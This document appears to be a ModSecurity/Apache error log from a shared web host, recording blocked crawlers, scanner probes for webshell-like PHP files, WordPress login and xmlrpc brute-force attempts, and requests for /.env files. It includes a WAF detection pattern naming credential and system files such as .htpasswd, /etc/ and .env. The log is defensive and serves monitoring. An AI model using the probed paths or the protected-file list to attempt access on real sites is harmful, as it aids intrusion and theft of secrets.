[Tue May 26 16:54:51.685271 2026] [security2:error] [pid 839808:tid 839931] [remote 114.119.128.236:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "kingsclub.in"] [uri "/summer-camp"] [unique_id "ahWDA5qtwAfohijxAqhTRAABQng"], referer: https://kingsclub.in/billiards/
[Tue May 26 16:54:52.025187 2026] [security2:error] [pid 839808:tid 840016] [client 114.119.156.119:58941] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "eco-green.com.mx"] [uri "/"] [unique_id "ahWDBJqtwAfohijxAqhTSwAAAVY"], referer: https://quero.party/keyword-ranking/1944950/difference%2Bbetween%2Bmds%2Band%2Bdos
[Tue May 26 16:54:52.322750 2026] [security2:error] [pid 839808:tid 839961] [client 176.99.12.164:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.cagmedya.com"] [uri "/wp-content/cache/speedycache/www.cagmedya.com/all/index.html"] [unique_id "ahWDBJqtwAfohijxAqhTVAAAAS4"]
[Tue May 26 16:54:52.720793 2026] [security2:error] [pid 839808:tid 839966] [client 20.12.190.196:50352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/xminie.php"] [unique_id "ahWDBJqtwAfohijxAqhTWwAAASQ"]
[Tue May 26 16:54:52.720965 2026] [security2:error] [pid 839808:tid 839966] [client 20.12.190.196:50352] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/xminie.php"] [unique_id "ahWDBJqtwAfohijxAqhTWwAAASQ"]
[Tue May 26 16:54:52.721031 2026] [security2:error] [pid 839808:tid 840054] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDA5qtwAfohijxAqhTOgAAAXw"]
[Tue May 26 16:54:52.802135 2026] [security2:error] [pid 839808:tid 840061] [client 176.99.12.164:53114] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.cagmedya.com"] [uri "/"] [unique_id "ahWDBJqtwAfohijxAqhTUgABg3k"]
[Tue May 26 16:54:53.668828 2026] [security2:error] [pid 839808:tid 840009] [client 20.12.190.196:55459] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/bal.php"] [unique_id "ahWDBZqtwAfohijxAqhTbgAAAU8"]
[Tue May 26 16:54:53.668964 2026] [security2:error] [pid 839808:tid 840009] [client 20.12.190.196:55459] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/bal.php"] [unique_id "ahWDBZqtwAfohijxAqhTbgAAAU8"]
[Tue May 26 16:54:54.497437 2026] [security2:error] [pid 839808:tid 840050] [client 117.198.37.168:62159] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDBpqtwAfohijxAqhTfQAAAXg"]
[Tue May 26 16:54:54.497609 2026] [security2:error] [pid 839808:tid 840050] [client 117.198.37.168:62159] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDBpqtwAfohijxAqhTfQAAAXg"]
[Tue May 26 16:54:54.667384 2026] [security2:error] [pid 839808:tid 840002] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDBZqtwAfohijxAqhTZwAAAUg"]
[Tue May 26 16:54:54.695981 2026] [security2:error] [pid 839808:tid 839942] [client 20.12.190.196:50095] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/drykl.php"] [unique_id "ahWDBpqtwAfohijxAqhTiAAAAQw"]
[Tue May 26 16:54:54.696122 2026] [security2:error] [pid 839808:tid 839942] [client 20.12.190.196:50095] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/drykl.php"] [unique_id "ahWDBpqtwAfohijxAqhTiAAAAQw"]
[Tue May 26 16:54:55.209979 2026] [security2:error] [pid 839808:tid 839995] [client 185.191.171.13:62404] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWDB5qtwAfohijxAqhTjwAAAUE"]
[Tue May 26 16:54:55.210139 2026] [security2:error] [pid 839808:tid 839995] [client 185.191.171.13:62404] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWDB5qtwAfohijxAqhTjwAAAUE"]
[Tue May 26 16:54:56.101601 2026] [security2:error] [pid 839808:tid 839814] [remote 95.216.117.13:54462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahWDB5qtwAfohijxAqhTmQABEgM"]
[Tue May 26 16:54:56.137879 2026] [security2:error] [pid 839808:tid 839967] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDBpqtwAfohijxAqhThwAAASU"]
[Tue May 26 16:54:56.687883 2026] [security2:error] [pid 839808:tid 840016] [client 20.12.190.196:50317] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/av.php"] [unique_id "ahWDCJqtwAfohijxAqhTqAAAAVY"]
[Tue May 26 16:54:56.688022 2026] [security2:error] [pid 839808:tid 840016] [client 20.12.190.196:50317] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/av.php"] [unique_id "ahWDCJqtwAfohijxAqhTqAAAAVY"]
[Tue May 26 16:54:57.874173 2026] [security2:error] [pid 839808:tid 840059] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDCJqtwAfohijxAqhTqwAAAYE"]
[Tue May 26 16:54:58.010992 2026] [core:crit] [pid 839808:tid 840005] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:54:58.540167 2026] [security2:error] [pid 839808:tid 840012] [client 20.12.190.196:50342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/11.php"] [unique_id "ahWDCpqtwAfohijxAqhTzQAAAVI"]
[Tue May 26 16:54:58.540298 2026] [security2:error] [pid 839808:tid 840012] [client 20.12.190.196:50342] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/11.php"] [unique_id "ahWDCpqtwAfohijxAqhTzQAAAVI"]
[Tue May 26 16:55:00.087675 2026] [security2:error] [pid 839808:tid 839984] [client 20.12.190.196:54212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/77.php"] [unique_id "ahWDDJqtwAfohijxAqhT7QAAATY"]
[Tue May 26 16:55:00.087784 2026] [security2:error] [pid 839808:tid 839984] [client 20.12.190.196:54212] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/77.php"] [unique_id "ahWDDJqtwAfohijxAqhT7QAAATY"]
[Tue May 26 16:55:00.116211 2026] [security2:error] [pid 839808:tid 839991] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDC5qtwAfohijxAqhT2gAAAT0"]
[Tue May 26 16:55:00.599958 2026] [security2:error] [pid 839808:tid 840011] [client 113.179.202.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDC5qtwAfohijxAqhT5QAAAVE"]
[Tue May 26 16:55:01.280213 2026] [security2:error] [pid 839808:tid 840007] [client 20.12.190.196:55455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/x402.php"] [unique_id "ahWDDZqtwAfohijxAqhUDgAAAU0"]
[Tue May 26 16:55:01.280325 2026] [security2:error] [pid 839808:tid 840007] [client 20.12.190.196:55455] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/x402.php"] [unique_id "ahWDDZqtwAfohijxAqhUDgAAAU0"]
[Tue May 26 16:55:01.766534 2026] [security2:error] [pid 839808:tid 839956] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDDJqtwAfohijxAqhT-wAAARo"]
[Tue May 26 16:55:01.912903 2026] [security2:error] [pid 839808:tid 839965] [client 176.65.139.232:39712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ellastylze.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWDDZqtwAfohijxAqhUGwAAASM"]
[Tue May 26 16:55:02.875429 2026] [security2:error] [pid 839808:tid 840041] [client 49.151.191.227:41594] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahWDDpqtwAfohijxAqhUIwAAAW8"]
[Tue May 26 16:55:02.969033 2026] [security2:error] [pid 839808:tid 840041] [client 49.151.191.227:41594] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "500"] [hostname "taotechservices.com"] [uri "/wp-comments-post.php"] [unique_id "ahWDDpqtwAfohijxAqhUIwAAAW8"]
[Tue May 26 16:55:04.205355 2026] [security2:error] [pid 839808:tid 840011] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDD5qtwAfohijxAqhUMwAAAVE"]
[Tue May 26 16:55:04.663404 2026] [security2:error] [pid 839808:tid 839965] [client 110.249.201.192:57234] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mosykay.com"] [uri "/robots.txt"] [unique_id "ahWDEJqtwAfohijxAqhUTgAAASM"]
[Tue May 26 16:55:05.683932 2026] [security2:error] [pid 839808:tid 839972] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDEJqtwAfohijxAqhUSgAAASo"]
[Tue May 26 16:55:05.806103 2026] [security2:error] [pid 839808:tid 840043] [client 117.198.37.168:62482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDEZqtwAfohijxAqhUYgAAAXE"]
[Tue May 26 16:55:05.806243 2026] [security2:error] [pid 839808:tid 840043] [client 117.198.37.168:62482] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDEZqtwAfohijxAqhUYgAAAXE"]
[Tue May 26 16:55:07.874650 2026] [security2:error] [pid 839808:tid 839832] [remote 5.42.158.148:51066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWDE5qtwAfohijxAqhUjgABdRU"]
[Tue May 26 16:55:08.260976 2026] [security2:error] [pid 839808:tid 840045] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDEpqtwAfohijxAqhUfAAAAXM"]
[Tue May 26 16:55:08.708515 2026] [security2:error] [pid 839808:tid 839833] [remote 82.223.24.195:57544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.24.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWDFJqtwAfohijxAqhUnAABahY"]
[Tue May 26 16:55:09.568673 2026] [security2:error] [pid 839808:tid 840055] [client 45.157.112.220:37371] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "jailanitradingcompany.com"] [uri "/"] [unique_id "ahWDFZqtwAfohijxAqhUqQAAAX0"]
[Tue May 26 16:55:09.905195 2026] [security2:error] [pid 839808:tid 840003] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDFJqtwAfohijxAqhUnwAAAUk"]
[Tue May 26 16:55:10.154577 2026] [security2:error] [pid 839808:tid 839944] [client 45.157.112.242:55989] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "jailanitradingcompany.com"] [uri "/index.php"] [unique_id "ahWDFpqtwAfohijxAqhUtAAAAQ4"]
[Tue May 26 16:55:11.341922 2026] [security2:error] [pid 839808:tid 839958] [client 176.65.139.232:23124] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "koiralalogistics.com.onesoft.in"] [uri "/.env"] [unique_id "ahWDF5qtwAfohijxAqhU0QAAARw"]
[Tue May 26 16:55:11.734279 2026] [security2:error] [pid 839808:tid 840047] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDFpqtwAfohijxAqhUwwAAAXU"]
[Tue May 26 16:55:12.179971 2026] [security2:error] [pid 839808:tid 839940] [client 186.223.176.174:20724] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 174.176.223.186.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "omshriinfrastructures.com"] [uri "/xmlrpc.php"] [unique_id "ahWDF5qtwAfohijxAqhU3wAAAQo"]
[Tue May 26 16:55:12.180177 2026] [security2:error] [pid 839808:tid 839940] [client 186.223.176.174:20724] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "omshriinfrastructures.com"] [uri "/xmlrpc.php"] [unique_id "ahWDF5qtwAfohijxAqhU3wAAAQo"]
[Tue May 26 16:55:13.309353 2026] [security2:error] [pid 839808:tid 840012] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDGJqtwAfohijxAqhU6QAAAVI"]
[Tue May 26 16:55:13.421637 2026] [security2:error] [pid 839808:tid 840066] [client 114.119.157.37:53967] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWDGZqtwAfohijxAqhVAQAAAYg"], referer: http://haddingtonwines.com/cart?remove_item=2000f6325dfc4fc3201fc45ed01c7a5d
[Tue May 26 16:55:15.203571 2026] [security2:error] [pid 839808:tid 840004] [client 117.198.37.168:62797] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDG5qtwAfohijxAqhVIwAAAUo"]
[Tue May 26 16:55:15.203727 2026] [security2:error] [pid 839808:tid 840004] [client 117.198.37.168:62797] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDG5qtwAfohijxAqhVIwAAAUo"]
[Tue May 26 16:55:15.972466 2026] [security2:error] [pid 839808:tid 840029] [client 114.119.158.38:55487] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "whitesun.in"] [uri "/1hfq/one-ui-pixel-theme.html"] [unique_id "ahWDG5qtwAfohijxAqhVMwAAAWM"], referer: https://whitesun.in/1hfq/one-ui-pixel-theme.html
[Tue May 26 16:55:17.262809 2026] [security2:error] [pid 839808:tid 840007] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDGpqtwAfohijxAqhVHwAAAU0"]
[Tue May 26 16:55:18.794816 2026] [security2:error] [pid 839808:tid 839974] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDHJqtwAfohijxAqhVRgAAASw"]
[Tue May 26 16:55:19.273213 2026] [security2:error] [pid 839808:tid 839851] [remote 74.7.241.58:49876] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWDH5qtwAfohijxAqhVbgABUCg"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:55:19.355369 2026] [core:crit] [pid 839808:tid 839992] (13)Permission denied: [client 40.77.167.61:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:55:19.467161 2026] [core:crit] [pid 839808:tid 839940] (13)Permission denied: [client 40.77.167.61:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:55:19.967160 2026] [security2:error] [pid 839808:tid 839953] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDHpqtwAfohijxAqhVYwAAARc"]
